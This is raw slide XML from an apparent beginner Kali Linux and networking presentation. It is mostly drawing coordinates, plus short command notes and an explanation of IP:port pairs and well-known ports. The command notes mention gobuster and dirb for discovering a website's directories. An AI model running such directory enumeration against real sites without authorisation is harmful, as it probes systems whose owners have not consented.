                  <a:lnTo>
                    <a:pt x="436234" y="57479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451753" y="81787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449790" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441941" y="93152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436685" y="94843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457143" y="94843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462264" y="90491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465648" y="83298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465648" y="68528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463978" y="63499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457324" y="55584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452520" y="52270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452202" y="52134"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="457325" y="9899"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="435670" y="9899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440407" y="11342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447828" y="17047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449678" y="20858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449625" y="30058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448821" y="33531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445414" y="39890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442324" y="42979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437881" y="45933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452636" y="45933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455858" y="43272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461520" y="34523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462941" y="30058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462941" y="18129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459963" y="12018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457325" y="9899"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="555512" y="2300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="486851" y="2300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486851" y="14093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543986" y="14093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495693" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510106" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555512" y="17318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555512" y="2300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="637531" y="11861"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="614204" y="11861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618986" y="13326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625866" y="19212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627580" y="23293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627580" y="34207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626001" y="39506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601009" y="68325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577663" y="88507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577663" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645580" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645580" y="91055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591603" y="91055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596069" y="87289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611091" y="74346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616054" y="69791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620858" y="65055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624219" y="61786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627084" y="58809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629430" y="56103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631798" y="53420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641340" y="31637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641281" y="19212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638407" y="12605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637531" y="11861"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="618670" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="603400" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598257" y="856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587610" y="3472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583347" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580167" y="6471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580167" y="20610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580843" y="20610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585377" y="17656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590024" y="15446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599468" y="12605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603964" y="11861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637531" y="11861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626723" y="2683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618670" y="202"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="669422" y="84267"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668407" y="84267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668407" y="98338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671858" y="99917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676302" y="101360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687061" y="103998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692543" y="104675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703550" y="104675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707969" y="103998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708284" y="103998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717671" y="100909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721640" y="98587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727569" y="93017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693039" y="93017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688054" y="92182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677723" y="88868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673234" y="86770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669422" y="84267"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="728927" y="11861"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="701971" y="11861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704475" y="12086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708874" y="12988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718731" y="31276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716701" y="35448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708580" y="41153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703122" y="42573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691573" y="42573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691573" y="53758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700979" y="53758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704069" y="54006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709821" y="55043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712257" y="55990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714287" y="57388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716317" y="58741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720761" y="75496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720242" y="78517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719227" y="80885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718234" y="83275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703458" y="92611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703257" y="92611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700686" y="93017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727569" y="93017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728001" y="92611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730347" y="89296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731994" y="85463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733663" y="81652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734498" y="77457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734498" y="68280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733798" y="64491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712595" y="47760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712595" y="46813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717941" y="45730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722588" y="43114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730437" y="34816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732400" y="29945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732400" y="20294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731588" y="16731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729050" y="12086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728927" y="11861"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="704430" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694550" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689385" y="879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678761" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674498" y="4960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671317" y="6539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671317" y="20610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671971" y="20610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676257" y="17836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="680791" y="15671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690400" y="12627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694934" y="11861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728927" y="11861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728250" y="10620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708738" y="653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704430" y="202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9" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19076EE-205D-F6A6-DFC4-8B5C05260D14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1638266" y="3196297"/>
              <a:ext cx="1329690" cy="520065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1329689" h="520064">
                  <a:moveTo>
                    <a:pt x="1324626" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="507366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4827" y="520017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329453" y="12650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324626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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF277475-4F9B-7342-0339-154D55EF7A5F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1" name="object 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0AA0A7-DF17-D7B7-6195-31488B03A531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79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39222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B51A-F8AC-BA6E-F7B5-8321020A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3E679-966B-EE9C-4CB1-04D4A2B13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66DC8F1-F8EB-CAEF-26C7-C9D49911F3D3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D17C54D-DCA0-208C-151E-FD565AEC1F5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35C6F8E-5764-B061-8C55-5FF99DB188C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8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2736ED8-3074-73EA-74F1-88CAE880CE99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E5F5642B-7B77-CBCC-0D9B-ABAED31171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4684DB54-F9B1-ECEE-D0EB-0AC171F3E818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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79CFAD82-29AE-9138-09D6-46EF0F74A7B8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AD704570-7D18-6F81-F4E5-56EF5FFA4A1B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A27BFD23-3C6C-27FD-94FB-9FF60FBE46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D348DCFB-269F-D77D-9228-089C696D74AC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7204B57-5B45-1C60-647F-1430817D1361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C931030E-156D-4A5E-6026-D1E1D7E84D61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8</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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02839BB-1DB7-4A31-32F8-9604AB95C6D4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1.2 All Kali Linux commands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345033E2-5EC6-1327-40E6-DCAE2EAFF6AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485139" y="1706880"/>
            <a:ext cx="293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 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> remove name tool        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29D5D3-57BE-40DB-0085-03DEBEC7D623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3464469" y="2145494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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B71943-DF6D-05B0-6FC4-BC8DCB370A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="1951990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Delete the tool  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7A78C676-3D6E-D62F-32CF-31C041D6E07E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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-passwd     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B2B35B-B89D-D30E-8ACF-9F804C69EDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745736" y="2608915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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05ADDA5E-FD5A-E184-DD7F-3738ECF075A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052249" y="2387599"/>
            <a:ext cx="3067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change password kali   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF60E9C-2A04-D65B-38E0-8409011EA9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2724150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 err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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A7D45C-9EAB-2A31-3539-401F7E35F662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729230" y="2945001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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D82BA6F-2E5E-D0BF-A629-9414F12035F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439285" y="2787650"/>
            <a:ext cx="3113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directory in website </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0C1D37-A481-D923-2D45-86A2F454A530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3184323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 err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> website     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r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874C2DAE-DED7-2BBC-3809-56665D76A472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379302" y="3208067"/>
            <a:ext cx="300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directory in website    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93ACBC-C8C7-9FBC-35A6-64EDC2915387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022920" y="3365336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D379143-7B4B-D223-1442-E9A5711F1343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775899" y="3737457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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A6153C-55ED-0C87-2935-6F64925280BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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-uptime    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90731A3A-F891-3C93-5E32-3B1D542D896E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455157" y="3528853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View time in system     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527214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D0AA389-6407-7B75-A353-ADDDDA7A3F4A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F2892ED-755A-9034-993F-7DFFE0795B87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Ports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7130A8A-2A25-C9A4-462C-07B7F6EF76A9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306112C-52AE-9118-F649-1EF9E1FB8500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80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31BDAFE-3C29-BD2B-2BBB-56AFC881A3FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1230187"/>
            <a:ext cx="772731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282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correctly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address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process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network,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have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endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="282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refer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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;IP&gt;:&lt;Port&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-86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pair.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example:</a:t>
            </a:r>
            <a:endParaRPr sz="240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spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>192.168.5.3:80</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" indent="-4572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spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>10.11.12.1:443</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" indent="-4572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038225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>172.16.8.9:22</a:t>
            </a:r>
            <a:endParaRPr sz="2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2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="7924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But,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know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right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common service?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376095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E83C908-D8AC-38D8-6A08-B44ED816A115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6470AA4-3E40-FDE1-4236-53A30B64F414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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Well-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known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Ports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701AF0B-482D-513B-4687-C7AC8866A342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08F8FB3-BF75-CB85-61DF-3D6376FCBB68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81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AC91B77-411C-3B7D-7042-9CC89F8E7D2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1446594"/>
            <a:ext cx="7910195" cy="273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1460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ranging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70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>0-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1023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,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first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1024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is,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are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called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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>well-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known</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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ports</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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most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common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services.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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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example,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when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web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browser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connects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via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HTTPS,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does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have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manually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specify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443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as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destination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port.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104085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989ABAA-B07E-2568-C208-CCC7A83B39C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449720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7D214F1-696B-82F0-47B1-034C8C864721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537146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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Well-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known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Ports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1E2B1C8-FF62-5587-0177-690B904C2C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528307" y="4835193"/>
            <a:ext cx="4526280" cy="1454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spc="-2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http://www.iana.org/assignments/service-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="800" spc="-35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names-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="800" spc="-4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port-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="800" spc="-25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numbers/service-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="800" spc="-35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names-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="800" spc="-4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port-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="800" spc="-1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numbers.xhtml</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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71118D3-A300-25FA-1830-486274BEDA09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236223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815BD79F-9474-DEDC-2023-B943D4E71875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
